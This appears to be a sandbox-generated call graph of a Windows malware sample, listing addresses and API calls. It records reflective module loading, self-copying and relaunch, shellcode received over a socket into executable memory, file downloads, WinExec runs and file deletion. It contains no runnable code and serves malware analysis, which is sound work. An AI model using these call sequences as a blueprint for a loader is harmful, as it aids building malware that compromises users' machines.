RtlInitializeSListHead 11437->11446 11439->11429 11440 d60bde __DllMainCRTStartup@12 11440->11439 11447 d60850 11440->11447 11443 d60922 11442->11443 11444 d60ee7 __DllMainCRTStartup@12 IsProcessorFeaturePresent 11443->11444 11445 d6092e ___scrt_uninitialize_crt 11444->11445 11445->11437 11446->11440 11448 d60855 ___scrt_release_startup_lock 11447->11448 11449 d60ee7 __DllMainCRTStartup@12 IsProcessorFeaturePresent 11448->11449 11450 d6085e __DllMainCRTStartup@12 11448->11450 11449->11450 11450->11439 11451 100102a9 11452 1001025a 11451->11452 11453 10010229 recv 11452->11453 11454 100102e8 VirtualAlloc memmove 11452->11454 11456 10010276 realloc 11452->11456 11453->11452 11455 100102a1 11453->11455 11459 1001031d 11454->11459 11457 100102a7 11455->11457 11458 100102ab closesocket WSACleanup free exit 11455->11458 11456->11452 11457->11454 11458->11459 11460 d5f278 11461 d5f29e CloseHandle 11460->11461 11462 d5f2f8 11461->11462 11516 10010b2c 11517 10010b46 11516->11517 11518 10010b3e 11516->11518 11519 10010b1e _MallocaArrayHolder free 11518->11519 11519->11517 10792 100010b0 10793 100010c2 10792->10793 10795 100010d0 10792->10795 10794 1000114e DefWindowProcW 10793->10794 10793->10795 10794->10795 11204 1000bdb0 11205 1000b6e0 9 API calls 11204->11205 11206 1000bdbf 11205->11206 11207 1000bdd2 11206->11207 11208 10010b1e _MallocaArrayHolder free 11206->11208 11208->11207 11463 1000aeb0 11464 1000aebf 11463->11464 11465 1000aef3 ?_Gnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11464->11465 11466 1000aed9 ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPAD_J 11464->11466 11475 1000aec7 11464->11475 11467 1000af66 11465->11467 11468 1000af17 _Min_value 11465->11468 11466->11475 11470 1000c120 2 API calls 11467->11470 11467->11475 11469 1000af24 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11468->11469 11478 10002ac0 memmove 11469->11478 11476 1000af7b 11470->11476 11472 1000af43 ?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH 11472->11467 11473 1000afd7 11473->11475 11477 1000afdd fread 11473->11477 11474 1000af8b fread 11474->11475 11474->11476 11476->11473 11476->11474 11477->11475 11478->11472 11479 1000b6b0 11480 1000b6d0 11479->11480 11481 1000b6c0 _lock_file 11479->11481 11481->11480 10859 d605e7 10864 d60427 10859->10864 10861 d605ef GetCurrentThread WaitForSingleObject CreateThread CreateThread 10877 d51147 LoadLibraryW GetProcAddress GetProcAddress 10861->10877 10920 100048c0 60 API calls 2 library calls 10861->10920 10921 100100c0 20 API calls 10861->10921 10865 d60450 10864->10865 10883 d60357 GetModuleFileNameA 10865->10883 10867 d60463 10885 d60307 GetModuleFileNameA 10867->10885 10869 d604aa 10870 d60307 GetModuleFileNameA 10869->10870 10876 d6053b 10869->10876 10871 d60565 10870->10871 10872 d6057c CopyFileA 10871->10872 10887 d52077 10872->10887 10874 d6058e ShellExecuteA 10889 d51807 GetModuleHandleA 10874->10889 10876->10861 10878 d51199 GetModuleHandleA RegisterClassW CreateWindowExW 10877->10878 10880 d5121e GetMessageW 10878->10880 10881 d5121c 10878->10881 10880->10881 10882 d51232 TranslateMessage DispatchMessageW 10880->10882 10882->10880 10884 d6039f 10883->10884 10884->10867 10886 d6033a 10885->10886 10886->10869 10888 d52086 10887->10888 10888->10874 10890 d5184a 10889->10890 10899 d515d7 10890->10899 10892 d518a2 10893 d5192f RegisterClassW 10892->10893 10905 d51727 10893->10905 10895 d519b2 CreateWindowExW ShowWindow 10896 d519eb GetMessageW 10895->10896 10897 d51a16 10896->10897 10898 d519ff TranslateMessage DispatchMessageW 10896->10898 10897->10876 10898->10896 10911 d52287 10899->10911 10901 d51612 SHGetKnownFolderPath 10902 d5168e 10901->10902 10903 d51641 10901->10903 10902->10892 10904 d51680 CoTaskMemFree 10903->10904 10904->10902 10906 d51749 10905->10906 10908 d51780 _Error_objects 10905->10908 10913 d60748 RtlAcquireSRWLockExclusive 10906->10913 10908->10895 10909 d51753 _Error_objects 10909->10908 10918 d606f7 RtlAcquireSRWLockExclusive RtlReleaseSRWLockExclusive RtlWakeAllConditionVariable 10909->10918 10912 d522b8 _Error_objects 10911->10912 10912->10901 10917 d6075c 10913->10917 10914 d60761 RtlReleaseSRWLockExclusive 10914->10909 10917->10914 10919 d60797 SleepConditionVariableSRW 10917->10919 10918->10908 10919->10917 11673 100113b5 11676 100116df 11673->11676 11677 100113c3 _except_handler4_common 11676->11677 11209 d59962 11210 d59965 _Smanip _Error_objects 11209->11210 11211 d54657 DeleteFileA 11210->11211 11212 d59c25 11211->11212 11213 d54417 SetFileAttributesA 11212->11213 11214 d59c56 11213->11214 11215 d59c68 Sleep 11214->11215 11216 d59c80 _Smanip _Error_objects 11215->11216 11217 d54657 DeleteFileA 11216->11217 11218 d5a1ce 11217->11218 11219 d54417 SetFileAttributesA 11218->11219 11220 d5a1ff 11219->11220 11221 d5a211 Sleep 11220->11221 11222 d5a229 _Smanip _Error_objects 11221->11222 11223 d5a5d8 WinExec 11222->11223 11224 d5a5eb _Smanip _Error_objects 11223->11224 11225 d5a8ca WinExec Sleep 11224->11225 11226 d5a8e8 11225->11226 11227 d54877 SetFileAttributesA 11226->11227 11228 d5a904 11227->11228 11229 d54877 SetFileAttributesA 11228->11229 11230 d5a93e 11229->11230 11231 d54657 DeleteFileA 11230->11231 11232 d5a962 11231->11232 11233 d54657 DeleteFileA 11232->11233 11234 d5a976 11233->11234 11520 1000e739 11521 1000e74a 11520->11521 11522 10002e00 allocator 2 API calls 11521->11522 11523 1000e75d _CxxThrowException 11522->11523 10796 1000d4ba 10797 10002e00 allocator 2 API calls 10796->10797 10798 1000d4cc _CxxThrowException 10797->10798 11284 1000463a 11285 1000cde0 22 API calls 11284->11285 11286 1000464b ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z 11285->11286 11287 10002190 8 API calls 11286->11287 11288 1000466c 11287->11288 10799 1000d0bc 10800 1000d0c3 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 10799->10800 10801 1000be70 3 API calls 10800->10801 10802 1000d0f9 10801->10802 10922 1001153c 10923 10011545 IsProcessorFeaturePresent 10922->10923 10924 10011544 10922->10924 10926 10011587 10923->10926 10929 1001154a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10926->10929 10928 1001166a 10929->10928 10657 10001040 10660 10004000 10657->10660 10663 10003f30 10660->10663 10666 1000cc90 10663->10666 10667 1000cca3 10666->10667 10670 1000e370 10667->10670 10669 10001051 10673 1000cc80 10670->10673 10672 1000e38d memset 10672->10669 10673->10672 10674 10001440 10679 10001470 10674->10679 10677 10001462 10685 100013f0 10679->10685 10682 10010b1e 10689 100113e4 10682->10689 10688 10001300 __std_exception_destroy 10685->10688 10687 100013ff 10687->10677 10687->10682 10688->10687 10690 10011691 free 10689->10690 10803 100014c0 10806 100014f0 10803->10806 10809 100012c0 __std_exception_copy 10806->10809 10808 100014d3 10809->10808 10691 d60097 WSAStartup getaddrinfo 10692 d60110 WSACleanup 10691->10692 10703 d60129 10691->10703 10707 d6011e 10692->10707 10693 d60144 socket 10695 d60186 connect 10693->10695 10696 d6016d WSACleanup 10693->10696 10694 d601cc FreeAddrInfoW 10697 d601e0 WSACleanup 10694->10697 10701 d601f9 10694->10701 10698 d601c5 10695->10698 10699 d601aa closesocket 10695->10699 10696->10707 10697->10707 10698->10694 10699->10703 10700 d60200 recv 10700->10701 10702 d60278 10700->10702 10701->10700 10706 d602bf VirtualAlloc 10701->10706 10704 d60282 closesocket WSACleanup 10702->10704 10705 d6027e 10702->10705 10703->10693 10703->10694 10704->10707 10705->10706 10706->10707 10708 d54897 10709 d548cf 10708->10709 10736 d54677 GetModuleFileNameA 10709->10736 10711 d548f8 _Smanip _Error_objects 10738 d54657 DeleteFileA 10711->10738 10713 d59c25 10740 d54417 10713->10740 10715 d59c56 10716 d59c68 Sleep 10715->10716 10717 d59c80 _Smanip _Error_objects 10716->10717 10718 d54657 DeleteFileA 10717->10718 10719 d5a1ce 10718->10719 10720 d54417 SetFileAttributesA 10719->10720 10721 d5a1ff 10720->10721 10722 d5a211 Sleep 10721->10722 10723 d5a229 _Smanip _Error_objects 10722->10723 10724 d5a5d8 WinExec 10723->10724 10725 d5a5eb _Smanip _Error_objects 10724->10725 10726 d5a8ca WinExec Sleep 10725->10726 10727 d5a8e8 10726->10727 10744 d54877 10727->10744 10729 d5a904 10730 d54877 SetFileAttributesA 10729->10730 10731 d5a93e 10730->10731 10732 d54657 DeleteFileA 10731->10732 10733 d5a962 10732->10733 10734 d54657 DeleteFileA 10733->10734 10735 d5a976 10734->10735 10737 d546bf _Error_objects Concurrency::task_continuation_context::task_continuation_context 10736->10737 10737->10711 10739 d54668 10738->10739 10739->10713 10742 d5444a 10740->10742 10741 d544be 10741->10715 10742->10741 10743 d544b6 SetFileAttributesA 10742->10743 10743->10741 10747 d51f27 10744->10747 10746 d54887 SetFileAttributesA 10746->10729 10748 d51f36 Concurrency::task_continuation_context::task_continuation_context 10747->10748 10748->10746 10810 100024cb 10811 100024d3 Concurrency::task_continuation_context::task_continuation_context 10810->10811 10813 100024da _Error_objects Concurrency::task_continuation_context::task_continuation_context 10811->10813 10814 10002ae0 memmove 10811->10814 10814->10813 11524 1000b350 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11525 1000b36b ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@ ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11524->11525 11530 1000b3ef Concurrency::task_continuation_context::task_continuation_context 11524->11530 11526 1000b383 Concurrency::task_continuation_context::task_continuation_context 11525->11526 11525->11530 11528 1000b3d0 ?_Gndec@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11526->11528 11529 1000b39c ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11526->11529 11527 1000b3e2 Concurrency::task_continuation_context::task_continuation_context 11528->11527 11533 1000b3bd 11529->11533 11530->11527 11531 1000b459 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11530->11531 11537 10003ef0 ungetc 11530->11537 11531->11527 11532 1000b46c 11531->11532 11539 1000c0c0 ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11532->11539 11533->11528 11533->11530 11538 10003f0d 11537->11538 11538->11527 11538->11531 11540 1000c0f8 ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00 11539->11540 11541 1000c0da ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@ ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11539->11541 11540->11527 11541->11540 10749 10011c50 10750 10011c6c 10749->10750 10751 10011c5c ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE 10749->10751 10751->10750 11488 d60e07 ___scrt_dllmain_exception_filter 10752 d51087 10753 d51099 10752->10753 10755 d510a7 10752->10755 10754 d51125 NtdllDefWindowProc_W 10753->10754 10753->10755 10754->10755 10815 d50006 10818 d50032 10815->10818 10819 d50ae4 GetPEB 10818->10819 10820 d5029b 10819->10820 10821 d50ae4 GetPEB 10820->10821 10825 d502a7 10821->10825 10822 d5002d 10823 d504a6 GetNativeSystemInfo 10823->10822 10824 d504d3 VirtualAlloc 10823->10824 10826 d504ec 10824->10826 10825->10822 10825->10823 10826->10822 10827 10010610 118 API calls 10826->10827 10827->10822 10828 d50000 10830 d50005 10828->10830 10831 d50006 10830->10831 10832 d50032 121 API calls 10831->10832 10833 d5002d 10832->10833 11290 d60280 11295 d60231 11290->11295 11291 d60200 recv 11293 d60278 11291->11293 11291->11295 11292 d602bf VirtualAlloc 11294 d602a2 11292->11294 11296 d60282 closesocket WSACleanup 11293->11296 11297 d6027e 11293->11297 11295->11291 11295->11292 11296->11294 11297->11292 11235 d6090d 11236 d60922 11235->11236 11239 d60ee7 IsProcessorFeaturePresent 11236->11239 11238 d6092e ___scrt_uninitialize_crt 11240 d60f0b 11239->11240 11240->11238 11542 10010b5d 11543 10010b68 11542->11543 11544 10010b9b 11542->11544 11547 10010b6d 11543->11547 11548 10010bb0 11543->11548 11545 10010cb7 __DllMainCRTStartup@12 15 API calls 11544->11545 11545->11547 11549 10010bbc ___scrt_is_nonwritable_in_current_image 11548->11549 11566 10010942 11549->11566 11551 10010bc3 __DllMainCRTStartup@12 11552 10010bea 11551->11552 11553 10010caf 11551->11553 11557 10010c4a ___scrt_is_nonwritable_in_current_image 11551->11557 11570 100108a4 11552->11570 11554 1001124d __DllMainCRTStartup@12 6 API calls 11553->11554 11556 10010cb6 11554->11556 11557->11547 11558 10010bf9 __RTC_Initialize 11558->11557 11573 100114a3 InitializeSListHead 11558->11573 11560 10010c07 11561 10010c0c _initterm_e 11560->11561 11561->11557 11562 10010c21 11561->11562 11574 10010879 11562->11574 11564 10010c26 11564->11557 11565 10010c2a _initterm 11564->11565 11565->11557 11567 1001094b 11566->11567 11583 10010f10 IsProcessorFeaturePresent 11567->11583 11569 10010957 ___scrt_uninitialize_crt 11569->11551 11585 1001097b 11570->11585 11572 100108ab 11572->11558 11573->11560 11575 1001087e ___scrt_release_startup_lock 11574->11575 11576 10010882 11575->11576 11577 10010889 11575->11577 11578 10010f10 IsProcessorFeaturePresent 11576->11578 11580 1001088e _configure_narrow_argv 11577->11580 11579 10010887 11578->11579 11579->11564 11581 10010899 11580->11581 11582 1001089c _initialize_narrow_environment 11580->11582 11581->11564 11582->11579 11584 10010f34 11583->11584 11584->11569 11586 10010987 11585->11586 11587 1001098b 11585->11587 11586->11572 11588 100109fa 11587->11588 11589 10010998 ___scrt_release_startup_lock 11587->11589 11590 1001124d __DllMainCRTStartup@12 6 API calls 11588->11590 11592 100109a5 _initialize_onexit_table 11589->11592 11593 100109c3 11589->11593 11591 10010a01 11590->11591 11592->11593 11594 100109b4 _initialize_onexit_table 11592->11594 11593->11572 11594->11593 10834 100108de 10835 100108e6 ___scrt_release_startup_lock 10834->10835 10836 10010903 _seh_filter_dll 10835->10836 9165 10001a60 9166 10001a81 6 API calls 9165->9166 9167 10001a72 9165->9167 9174 10001f50 9166->9174 9168 10001b52 PostQuitMessage 9167->9168 9169 10001a7c DefWindowProcW 9167->9169 9173 10001b75 9168->9173 9169->9173 9172 10001b32 CreateThread 9172->9173 9176 10001b80 9172->9176 9175 10001f5f Concurrency::task_continuation_context::task_continuation_context 9174->9175 9175->9172 9179 10001bb0 9176->9179 9178 10001ba3 9194 10011760 9179->9194 9182 10001c51 InternetReadFile 9184 10001c73 9182->9184 9185 10001d27 fclose InternetCloseHandle InternetCloseHandle GetParent ShowWindow 9182->9185 9183 10001c3a SendMessageW 9183->9182 9184->9182 9184->9185 9186 10001c7d fwrite 9184->9186 9191 10001d11 SendMessageW 9184->9191 9196 10001750 9185->9196 9186->9184 9188 10001d6b 9189 10001750 17 API calls 9188->9189 9190 10001d7b 9189->9190 9210 1000f330 9190->9210 9191->9184 9195 10001bbd InternetOpenA InternetOpenUrlA fopen HttpQueryInfoW 9194->9195 9195->9182 9195->9183 9197 10001772 9196->9197 9200 100017a9 _Error_objects 9196->9200 9249 10010771 AcquireSRWLockExclusive 9197->9249 9199 1000177c _Error_objects 9199->9200 9254 10010b09 9199->9254 9238 10002e30 9200->9238 9204 100017f9 9242 10001de0 9204->9242 9207 1000180a 9246 10001dc0 9207->9246 9209 10001812 9209->9188 9211 1000f352 9210->9211 9328 1000f590 9211->9328 9218 1000f3b1 9343 1000ef30 9218->9343 9219 1000f240 NdrClientCall2 9219->9218 9225 1000f42e Sleep 9227 1000f080 5 API calls 9225->9227 9226 10001d8e exit 9226->9178 9228 1000f40a 9227->9228 9228->9225 9228->9226 9229 1000f457 9228->9229 9362 1000f210 9229->9362 9231 1000f47f Sleep 9365 1000f5b0 9231->9365 9234 10001dc0 2 API calls 9235 1000f464 9234->9235 9235->9226 9235->9231 9235->9234 9236 1000f4c4 9235->9236 9369 1000f260 CreateToolhelp32Snapshot 9235->9369 9380 1000f240 9236->9380 9240 10002e65 HandleT 9238->9240 9239 10002ea2 _Error_objects 9239->9204 9240->9239 9258 100038b0 9240->9258 9243 10001df2 HandleT Concurrency::task_continuation_context::task_continuation_context 9242->9243 9244 100023a0 2 API calls 9243->9244 9245 10001dfa 9243->9245 9244->9245 9245->9207 9247 100023a0 2 API calls 9246->9247 9248 10001dcf 9247->9248 9248->9209 9250 10010785 9249->9250 9251 1001078a ReleaseSRWLockExclusive 9250->9251 9323 100107c0 SleepConditionVariableSRW 9250->9323 9251->9199 9324 10010adb 9254->9324 9257 10010720 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 9257->9200 9259 100038dc Concurrency::task_continuation_context::task_continuation_context 9258->9259 9261 1000391c 9259->9261 9266 100015e0 ?_Xlength_error@std@@YAXPBD 9259->9266 9263 1000393f Concurrency::task_continuation_context::task_continuation_context 9261->9263 9267 100039e0 9261->9267 9270 10003b00 9263->9270 9266->9261 9274 10003b90 9267->9274 9271 100039c1 9270->9271 9272 10003b0f 9270->9272 9271->9239 9307 100023a0 9272->9307 9277 10003bd0 9274->9277 9282 10003c70 9277->9282 9283 10003c8a 9282->9283 9285 10003be0 9282->9285 9293 10001490 9283->9293 9286 10003c30 9285->9286 9287 10003c3d 9286->9287 9290 10003a05 9286->9290 9288 10003c54 9287->9288 9289 10003c46 9287->9289 9304 10001520 9288->9304 9296 10003cb0 9289->9296 9290->9263 9294 10001410 stdext::threads::lock_error::lock_error 9293->9294 9295 1000149e _CxxThrowException 9294->9295 9295->9285 9297 10003cc7 9296->9297 9298 10003ccc 9296->9298 9299 10001490 allocator _CxxThrowException 9297->9299 9300 10001520 allocator _callnewh malloc _CxxThrowException _CxxThrowException 9298->9300 9299->9298 9301 10003cd6 9300->9301 9302 10003ce4 _invalid_parameter_noinfo_noreturn 9301->9302 9303 10003cf3 9301->9303 9302->9301 9302->9302 9303->9290 9305 100107d5 allocator _callnewh malloc _CxxThrowException _CxxThrowException 9304->9305 9306 1000152c 9305->9306 9306->9290 9308 100023b7 Concurrency::task_continuation_context::task_continuation_context 9307->9308 9310 100023e8 _Error_objects 9308->9310 9311 10002b30 9308->9311 9310->9271 9314 10002dc0 9311->9314 9317 10003550 9314->9317 9318 10003571 9317->9318 9321 1000357e 9317->9321 9319 10001540 allocator _invalid_parameter_noinfo_noreturn 9318->9319 9319->9321 9320 10010b1e _MallocaArrayHolder free 9322 10002b5b 9320->9322 9321->9320 9322->9310 9323->9250 9325 10010af1 _register_onexit_function 9324->9325 9326 10010aea _crt_atexit 9324->9326 9327 1000179c 9325->9327 9326->9327 9327->9257 9383 1000f8a0 9328->9383 9331 1000ee80 RpcStringBindingComposeW 9332 1000eed1 RpcBindingFromStringBindingW RpcBindingSetAuthInfoExA RpcStringFreeW 9331->9332 9333 1000eecd 9331->9333 9332->9333 9334 1000f080 9333->9334 9337 1000f0a9 9334->9337 9336 1000f0e3 9336->9218 9336->9219 9337->9336 9338 1000f1e1 CoTaskMemFree 9337->9338 9339 1000f1ce CoTaskMemFree 9337->9339 9340 1000f171 9337->9340 9409 1000ff70 NdrClientCall2 9337->9409 9338->9336 9338->9337 9339->9337 9341 1000f18b CoTaskMemFree 9340->9341 9342 1000f19e CoTaskMemFree 9340->9342 9341->9340 9342->9336 9344 1000f5b0 8 API calls 9343->9344 9345 1000ef57 9344->9345 9346 1000f5b0 8 API calls 9345->9346 9347 1000ef6a 9346->9347 9348 1000f5b0 8 API calls 9347->9348 9349 1000ef7a 9348->9349 9351 1000efc7 9349->9351 9410 1000f550 9349->9410 9352 10001dc0 2 API calls 9351->9352 9353 1000f049 9352->9353 9354 10001dc0 2 API calls 9353->9354 9355 1000f055 9354->9355 9356 10001dc0 2 API calls 9355->9356 9357 1000f064 9356->9357 9358 1000ed40 9357->9358 9469 1000ecf0 9358->9469 9361 1000ff40 NdrClientCall2 9361->9228 9474 1000ffb0 NdrClientCall2 9362->9474 9364 1000f231 9364->9235 9366 1000f5e1 HandleT _Error_objects 9365->9366 9475 1000fad0 9366->9475 9368 1000f60a 9368->9235 9370 1000f283 Process32FirstW 9369->9370 9371 1000f27c 9369->9371 9372 1000f2a2 9370->9372 9373 1000f2d5 9370->9373 9371->9235 9489 1000cde0 9372->9489 9375 1000f2dd _wcsicmp 9373->9375 9377 1000f300 Process32NextW 9375->9377 9378 1000f2f2 CloseHandle 9375->9378 9377->9373 9379 1000f315 CloseHandle 9377->9379 9378->9371 9379->9371 9531 1000fff0 NdrClientCall2 9380->9531 9382 1000f252 9382->9226 9384 1000f8b0 HandleT 9383->9384 9387 1000f950 9384->9387 9386 1000f360 9386->9331 9388 1000f964 9387->9388 9389 1000f9ad 9387->9389 9393 1000fa10 memmove 9388->9393 9394 1000fd40 9389->9394 9392 1000f989 _Error_objects 9392->9386 9393->9392 9395 1000fd51 9394->9395 9397 1000fd5b Concurrency::task_continuation_context::task_continuation_context 9395->9397 9404 100015e0 ?_Xlength_error@std@@YAXPBD 9395->9404 9398 100039e0 6 API calls 9397->9398 9399 1000fd8c HandleT Concurrency::task_continuation_context::task_continuation_context 9398->9399 9405 1000f9d0 9399->9405 9401 1000fdc9 9402 10002b30 2 API calls 9401->9402 9403 1000fde3 Concurrency::task_continuation_context::task_continuation_context 9401->9403 9402->9403 9403->9392 9404->9397 9408 10002ae0 memmove 9405->9408 9407 1000f9ea _Error_objects 9407->9401 9408->9407 9409->9337 9411 1000f56a 9410->9411 9414 1000f630 9411->9414 9434 10002cf0 9414->9434 9416 1000f64b 9417 1000f693 9416->9417 9418 1000f66c 9416->9418 9419 1000f6b3 9417->9419 9420 1000f71d 9417->9420 9438 1000fa10 memmove 9418->9438 9439 1000fa10 memmove 9419->9439 9421 1000f803 9420->9421 9422 1000f738 9420->9422 9444 1000fc10 9421->9444 9441 1000fa10 memmove 9422->9441 9426 1000f6db 9440 1000fa10 memmove 9426->9440 9429 1000f585 9429->9349 9430 1000f7be 9442 1000fa10 memmove 9430->9442 9432 1000f7d2 9443 10002ae0 memmove 9432->9443 9435 10002d02 9434->9435 9436 10002d07 9434->9436 9457 10002de0 ?_Xout_of_range@std@@YAXPBD 9435->9457 9436->9416 9438->9429 9439->9426 9440->9429 9441->9430 9442->9432 9443->9429 9445 1000fc30 9444->9445 9447 1000fc3d Concurrency::task_continuation_context::task_continuation_context 9445->9447 9458 100015e0 ?_Xlength_error@std@@YAXPBD 9445->9458 9448 100039e0 6 API calls 9447->9448 9449 1000fc77 HandleT Concurrency::task_continuation_context::task_continuation_context 9448->9449 9450 1000fcac HandleT 9449->9450 9451 1000fcff 9449->9451 9459 1000f830 9450->9459 9452 1000f830 memmove 9451->9452 9456 1000fcf2 Concurrency::task_continuation_context::task_continuation_context 9452->9456 9455 10002b30 2 API calls 9455->9456 9456->9429 9457->9436 9458->9447 9466 10002ae0 memmove 9459->9466 9461 1000f848 9467 10002ae0 memmove 9461->9467 9463 1000f862 9468 10002ae0 memmove 9463->9468 9465 1000f897 9465->9455 9466->9461 9467->9463 9468->9465 9473 1000ece0 9469->9473 9471 1000ed0f __stdio_common_vswprintf 9472 1000ed28 9471->9472 9472->9361 9473->9471 9474->9364 9476 1000fae7 9475->9476 9478 1000faf1 Concurrency::task_continuation_context::task_continuation_context 9476->9478 9486 100015e0 ?_Xlength_error@std@@YAXPBD 9476->9486 9479 1000fb1b 9478->9479 9481 1000fb6c 9478->9481 9487 10002ae0 memmove 9479->9487 9483 100039e0 6 API calls 9481->9483 9482 1000fb3f HandleT _Error_objects Concurrency::task_continuation_context::task_continuation_context 9482->9368 9484 1000fb93 HandleT Concurrency::task_continuation_context::task_continuation_context 9483->9484 9488 10002ae0 memmove 9484->9488 9486->9478 9487->9482 9488->9482 9512 10002a80 9489->9512 9491 1000ce12 ?width@ios_base@std@ 9492 1000ce8a 9491->9492 9493 1000ce3a 9491->9493 9514 1000bec0 9492->9514 9493->9492 9494 1000ce42 ?width@ios_base@std@ 9493->9494 9494->9492 9495 1000ce61 9494->9495 9495->9492 9497 1000ce6b ?width@ios_base@std@ 9495->9497 9497->9492 9498 1000cead 9499 1000ced4 ?flags@ios_base@std@ 9498->9499 9500 1000cec6 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 9498->9500 9507 1000cef9 Concurrency::task_continuation_context::task_continuation_context 9499->9507 9510 1000cf79 9499->9510 9521 1000be70 ?uncaught_exception@std@ 9500->9521 9503 1000cfc8 Concurrency::task_continuation_context::task_continuation_context 9505 1000d073 ?width@ios_base@std@@QAE_J_J 9503->9505 9509 1000d005 ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2 ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@ ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD 9503->9509 9511 1000d063 9503->9511 9504 1000cf8f ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J 9504->9503 9505->9500 9508 1000cf1b ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2 ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@ ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD 9507->9508 9507->9510 9508->9507 9509->9503 9510->9503 9510->9504 9511->9505 9513 10002a95 9512->9513 9513->9491 9513->9513 9527 1000cac0 ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2 9514->9527 9517 1000bf12 ?tie@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_ostream@DU?$char_traits@D@std@@@2 9518 1000bf09 9517->9518 9519 1000bf2c HandleT 9517->9519 9518->9498 9519->9518 9520 1000bf46 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12 ?good@ios_base@std@ 9519->9520 9520->9518 9522 1000be86 9521->9522 9523 1000beaa 9522->9523 9524 1000be9e ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 9522->9524 9529 1000ca50 ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2 9523->9529 9524->9523 9528 1000beea ?good@ios_base@std@ 9527->9528 9528->9517 9528->9518 9530 1000beb2 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z CloseHandle 9529->9530 9530->9371 9531->9382 11241 1000bde0 11242 10004510 11 API calls 11241->11242 11243 1000bdf2 11242->11243 11244 1000be0b 11243->11244 11245 10010b1e _MallocaArrayHolder free 11243->11245 11245->11244 11298 1000ee60 free 11595 10001360 11600 10001300 __std_exception_destroy 11595->11600 11597 1000136f 11598 10001382 11597->11598 11599 10010b1e _MallocaArrayHolder free 11597->11599 11599->11598 11600->11597 10837 10011ce0 ??1_Lockit@std@@QAE 11489 d51a37 11490 d51a49 11489->11490 11491 d51a58 GetModuleHandleA CreateWindowExW 11489->11491 11492 d51a53 NtdllDefWindowProc_W 11490->11492 11493 d51b29 PostQuitMessage 11490->11493 11497 d51abb SendMessageW 11491->11497 11494 d51b4c 11492->11494 11493->11494 11498 d51ae5 11497->11498 11499 d51b09 CreateThread 11498->11499 11499->11494 11500 10001b80 79 API calls 11499->11500 10838 1000d4e5 10839 1000d4ec 10838->10839 10840 1000dbb0 2 API calls 10839->10840 10841 1000d502 10840->10841 11683 d60b33 11684 d60b36 11683->11684 11685 d60b87 __DllMainCRTStartup@12 2 API calls 11684->11685 11686 d60b44 __DllMainCRTStartup@12 11684->11686 11685->11686 9532 d50032 9542 d50ae4 GetPEB 9532->9542 9535 d50ae4 GetPEB 9539 d502a7 9535->9539 9536 d50a9c 9537 d504a6 GetNativeSystemInfo 9537->9536 9538 d504d3 VirtualAlloc 9537->9538 9540 d504ec 9538->9540 9539->9536 9539->9537 9540->9536 9544 10010610 9540->9544 9543 d5029b 9542->9543 9543->9535 9549 10010450 9544->9549 9550 10010479 9549->9550 9581 10010380 GetModuleFileNameA 9550->9581 9552 1001048c 9593 10010080 9552->9593 9556 100104d3 9599 100020a0 9556->9599 9558 1001055c 9559 10010582 9558->9559 9560 10010564 9558->9560 9562 10010330 9 API calls 9559->9562 9561 100020a0 2 API calls 9560->9561 9563 10010570 9561->9563 9564 1001058e 9562->9564 9565 100020a0 2 API calls 9563->9565 9567 100105a5 CopyFileA 9564->9567 9566 1001057f GetCurrentThread WaitForSingleObject CreateThread CreateThread 9565->9566 9575 10001170 LoadLibraryW GetProcAddress GetProcAddress 9566->9575 9817 100048c0 9566->9817 10057 100100c0 WSAStartup getaddrinfo 9566->10057 9568 100020a0 2 API calls 9567->9568 9569 100105b7 ShellExecuteA 9568->9569 9602 10001830 GetModuleHandleA 9569->9602 9572 100020a0 2 API calls 9573 100105e3 9572->9573 9574 100020a0 2 API calls 9573->9574 9574->9566 9576 100011c2 GetModuleHandleA RegisterClassW CreateWindowExW 9575->9576 9578 10001245 exit 9576->9578 9579 10001247 GetMessageW 9576->9579 9578->9536 9579->9578 9580 1000125b TranslateMessage DispatchMessageW 9579->9580 9580->9579 9632 10002190 9581->9632 9586 100103e7 9640 10001ec0 9586->9640 9587 10010419 9591 100020a0 2 API calls 9587->9591 9590 100020a0 2 API calls 9592 10010414 